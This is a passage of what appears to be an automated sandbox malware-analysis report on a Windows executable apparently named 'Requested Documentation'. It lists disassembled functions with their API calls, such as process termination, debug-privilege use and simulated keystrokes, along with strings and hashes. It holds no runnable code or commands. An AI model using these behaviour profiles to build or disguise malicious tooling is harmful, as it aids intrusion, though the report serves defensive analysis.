                                                                              • Opcode ID: 98ce9159268b29e8194b1bcfc7e5eb5ce71522956035782e99469d02c5f56f5e
                                                                              • Instruction ID: 03725fd0aabe94c5fe6d091b4a6affaf365b0cf2d84d234ae6659b907060ef4b
                                                                              • Opcode Fuzzy Hash: 98ce9159268b29e8194b1bcfc7e5eb5ce71522956035782e99469d02c5f56f5e
                                                                              • Instruction Fuzzy Hash: 10E1B1316043059FCB14EF24C8A1B7ABBE5AF85354F18896DF9999B3A2DB30DC41CB52
                                                                              Function 009E4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E3697,?), ref: 009E468B
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E3697,?), ref: 009E46A4
                                                                                • Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 009E4D40
                                                                              • _wcscmp.LIBCMT ref: 009E4D5A
                                                                              • MoveFileW.KERNEL32(?,?), ref: 009E4D75
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 793581249-0
                                                                              • Opcode ID: 1e2c1f89c523f907fdd0c94f84adcc49342eab559b6387b7099b5232cd93dbc5
                                                                              • Instruction ID: 322f971fd966e2c25a38d5f0623f458175155e431f8e6fee15bc3e4654b5ce35
                                                                              • Opcode Fuzzy Hash: 1e2c1f89c523f907fdd0c94f84adcc49342eab559b6387b7099b5232cd93dbc5
                                                                              • Instruction Fuzzy Hash: A25152B24083859BC725EBA4DC81ADFB3ECAF85750F40092EF589D3191EE34E588C766
                                                                              Function 00A08645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A086FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: d75acf520d608e0df4329a355c57b38196204998154167d5a43769eddc4cb54b
                                                                              • Instruction ID: ac8a90732e8639cac9ce840676017f704cfd468089ee9de9555ee42e4623854c
                                                                              • Opcode Fuzzy Hash: d75acf520d608e0df4329a355c57b38196204998154167d5a43769eddc4cb54b
                                                                              • Instruction Fuzzy Hash: FC51C53050024CBFDF209B68EC89FAD7BA4FB05764F604111F990E62E1CF7AA991CB58
                                                                              Function 00982B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009BC2F7
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009BC319
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009BC331
                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009BC34F
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009BC370
                                                                              • DestroyIcon.USER32(00000000), ref: 009BC37F
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009BC39C
                                                                              • DestroyIcon.USER32(?), ref: 009BC3AB
                                                                                • Part of subcall function 00A0A4AF: DeleteObject.GDI32(00000000), ref: 00A0A4E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                              • String ID:
                                                                              • API String ID: 2819616528-0
                                                                              • Opcode ID: 205da5a83a88c8747bca741d8fcfa26d55586b6c195d4113775453314c8e3b0b
                                                                              • Instruction ID: 93ee1231c6ea9a64e196e69b0ccd9cd3d0d51972e113a279768e790ac6316ee1
                                                                              • Opcode Fuzzy Hash: 205da5a83a88c8747bca741d8fcfa26d55586b6c195d4113775453314c8e3b0b
                                                                              • Instruction Fuzzy Hash: 5F516974A00209AFDB20EF64CC45FAA7BF9EB59720F104528F952E72A0DB71ED91DB50
                                                                              Function 009D966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009DA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 009DA84C
                                                                                • Part of subcall function 009DA82C: GetCurrentThreadId.KERNEL32 ref: 009DA853
                                                                                • Part of subcall function 009DA82C: AttachThreadInput.USER32(00000000,?,009D9683,?,00000001), ref: 009DA85A
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D968E
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009D96AB
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009D96AE
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D96B7
                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009D96D5
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D96D8
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D96E1
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009D96F8
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D96FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              • Opcode ID: e41ca489800880b9ae454c77c0c264e8b4a277e12e4cb2ad8e034dad660e7417
                                                                              • Instruction ID: 1aab8fe49bba6099345a7a5264ba9ff95b3cd2b9abc2a44b67443734e941fd08
                                                                              • Opcode Fuzzy Hash: e41ca489800880b9ae454c77c0c264e8b4a277e12e4cb2ad8e034dad660e7417
                                                                              • Instruction Fuzzy Hash: 9211CEB1950218BFF620ABA09C89F6A3A2DEB4C750F104426F744AB1A0C9F35C129AA4
                                                                              Function 009D8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009D853C,00000B00,?,?), ref: 009D892A
                                                                              • HeapAlloc.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D8931
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009D853C,00000B00,?,?), ref: 009D8946
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,009D853C,00000B00,?,?), ref: 009D894E
                                                                              • DuplicateHandle.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D8951
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009D853C,00000B00,?,?), ref: 009D8961
                                                                              • GetCurrentProcess.KERNEL32(009D853C,00000000,?,009D853C,00000B00,?,?), ref: 009D8969
                                                                              • DuplicateHandle.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D896C
                                                                              • CreateThread.KERNEL32(00000000,00000000,009D8992,00000000,00000000,00000000), ref: 009D8986
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 49e86fc80761661ff567a568f3f2666af7021e1aed8da476988d3171d0c54639
                                                                              • Instruction ID: 9962b2def6327e1ea956c1fc53e10416d2b5e137d110c0290af3f601086613f2
                                                                              • Opcode Fuzzy Hash: 49e86fc80761661ff567a568f3f2666af7021e1aed8da476988d3171d0c54639
                                                                              • Instruction Fuzzy Hash: E001AC75240308FFE620EBA5DC49F673B6CEB89711F408521FB05DB691CA7098028A20
                                                                              Function 009F9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 0-572801152
                                                                              • Opcode ID: b360672045471b04791f3284d31789209a5499418526d48d1d3f41f6798b08ad
                                                                              • Instruction ID: 6ba0149a2ad0981fd763900f8a87048d4a3fb4d821dd1aa340136534bcea561d
                                                                              • Opcode Fuzzy Hash: b360672045471b04791f3284d31789209a5499418526d48d1d3f41f6798b08ad
                                                                              • Instruction Fuzzy Hash: 9CC18171A0021E9FDF10DF98D884BBEB7F9BB88314F148469EA45AB281E7719D45CB90
                                                                              Function 009F9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-625585964
                                                                              • Opcode ID: b52bf7b2bcfa747eb836ae8eae0e09c1ca136202abfc0947cae33db1955fcba1
                                                                              • Instruction ID: 116fe4b1c2b8d42acef0798b36e33a2f2aa6002286b7184b0950e25d4e97fe4c
                                                                              • Opcode Fuzzy Hash: b52bf7b2bcfa747eb836ae8eae0e09c1ca136202abfc0947cae33db1955fcba1
                                                                              • Instruction Fuzzy Hash: 6891B031E00219ABDF24DFA5C888FAEB7B8EF85714F108559F615AB280D7749941CFA0
                                                                              Function 009F975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009D710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?,?,009D7455), ref: 009D7127
                                                                                • Part of subcall function 009D710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7142
                                                                                • Part of subcall function 009D710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7150
                                                                                • Part of subcall function 009D710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?), ref: 009D7160
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009F9806
                                                                              • _memset.LIBCMT ref: 009F9813
                                                                              • _memset.LIBCMT ref: 009F9956
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009F9982
                                                                              • CoTaskMemFree.OLE32(?), ref: 009F998D
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 009F99DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: 930a7fc4fa9c8101bd55280c02f8d3325cc6f0adac4f1084eb77a92e65e5bb42
                                                                              • Instruction ID: 5cdb87632205ee63b9d29d0e94eba64c507e877c7a02169d157a28f3b0a7dcc2
                                                                              • Opcode Fuzzy Hash: 930a7fc4fa9c8101bd55280c02f8d3325cc6f0adac4f1084eb77a92e65e5bb42
                                                                              • Instruction Fuzzy Hash: 51911771D0021DEBDB10DFA5DC85BEEBBB9AF48310F20415AF519A7291EB719A44CFA0
                                                                              Function 00A06D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A06E24
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00A06E38
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A06E52
                                                                              • _wcscat.LIBCMT ref: 00A06EAD
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A06EC4
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A06EF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: 3899da4670c012cfe578500c9d3a6f0d804a8f0a51034efa7a2e1276ae07af02
                                                                              • Instruction ID: 73995219c4a0760af6c037dc382e9e062f013f5a7bca1749b57ce53287b35fa5
                                                                              • Opcode Fuzzy Hash: 3899da4670c012cfe578500c9d3a6f0d804a8f0a51034efa7a2e1276ae07af02
                                                                              • Instruction Fuzzy Hash: 9541A074A0034DAFEB21DFA4DC85BEA77E8EF08354F10082AF584A72D1D6729D958B60
                                                                              Function 009FE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009E3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 009E3C7A
                                                                                • Part of subcall function 009E3C55: Process32FirstW.KERNEL32(00000000,?), ref: 009E3C88
                                                                                • Part of subcall function 009E3C55: CloseHandle.KERNEL32(00000000), ref: 009E3D52
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9A4
                                                                              • GetLastError.KERNEL32 ref: 009FE9B7
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9E6
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 009FEA63
                                                                              • GetLastError.KERNEL32(00000000), ref: 009FEA6E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009FEAA3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 55bd51f55d8a0efa5af796dc2d9cc4c9e717aaf76dfdfb55a32359a920cd20c1
                                                                              • Instruction ID: bc66e8dfbe3b0997a0e92cd19d395d37dc96ef52a9ee6499d62af03da67eb707
                                                                              • Opcode Fuzzy Hash: 55bd51f55d8a0efa5af796dc2d9cc4c9e717aaf76dfdfb55a32359a920cd20c1
                                                                              • Instruction Fuzzy Hash: 9341AB712002059FDB25EF54CCA5F7EB7A5AF84314F188419FA029B3D2CBB4E849CB92
                                                                              Function 009E2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 009E3033
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: a443637f314262ae7ddd14ef97f601f65494f0baecf6918d4fe8249dcdd49036
                                                                              • Instruction ID: 51058834652785f86e496024d0328dabb1c4eae29b6e4b2f9627a448e425f6dd
                                                                              • Opcode Fuzzy Hash: a443637f314262ae7ddd14ef97f601f65494f0baecf6918d4fe8249dcdd49036
                                                                              • Instruction Fuzzy Hash: 78116A313483C6BEE7269B5ADC46D6B779CDF16321F20442AF900A7582DB789F4046A1
                                                                              Function 009E42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009E4312
                                                                              • LoadStringW.USER32(00000000), ref: 009E4319
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009E432F
                                                                              • LoadStringW.USER32(00000000), ref: 009E4336
                                                                              • _wprintf.LIBCMT ref: 009E435C
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009E437A
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 009E4357
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: 9869fca580084070f4ace39e5f4ffe1d35837d525799d42c4185a1840d1e65ec
                                                                              • Instruction ID: 8ad4723110290dcad18035a42fe3314369c75736066635bdd5c021a5533e9f5d
                                                                              • Opcode Fuzzy Hash: 9869fca580084070f4ace39e5f4ffe1d35837d525799d42c4185a1840d1e65ec
                                                                              • Instruction Fuzzy Hash: AA014FF290024CBFE761D7E0DD89EE7776CEB08300F0005A1BB49E6051EA755E864B71
                                                                              Function 00A0D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A0D47C
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A0D49C
                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A0D6D7
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A0D6F5
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A0D716
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00A0D735
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A0D75A
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00A0D77D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                              • String ID:
                                                                              • API String ID: 1211466189-0
                                                                              • Opcode ID: 08e5fc65a15a2ab46ff4ac6d8638b84b278d839d538cd9a79f47fc2f73e35aa1
                                                                              • Instruction ID: fa225f11f4484509435b8b4897fe2a8a09639b445958a284109d75901f54b73c
                                                                              • Opcode Fuzzy Hash: 08e5fc65a15a2ab46ff4ac6d8638b84b278d839d538cd9a79f47fc2f73e35aa1
                                                                              • Instruction Fuzzy Hash: E2B19A76A00229EFDF14CFA8D9C57AD7BB1BF04701F088169EC48AF295D735A990CB90
                                                                              Function 00982A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 00982ACF
                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00982B17
                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 009BC21A
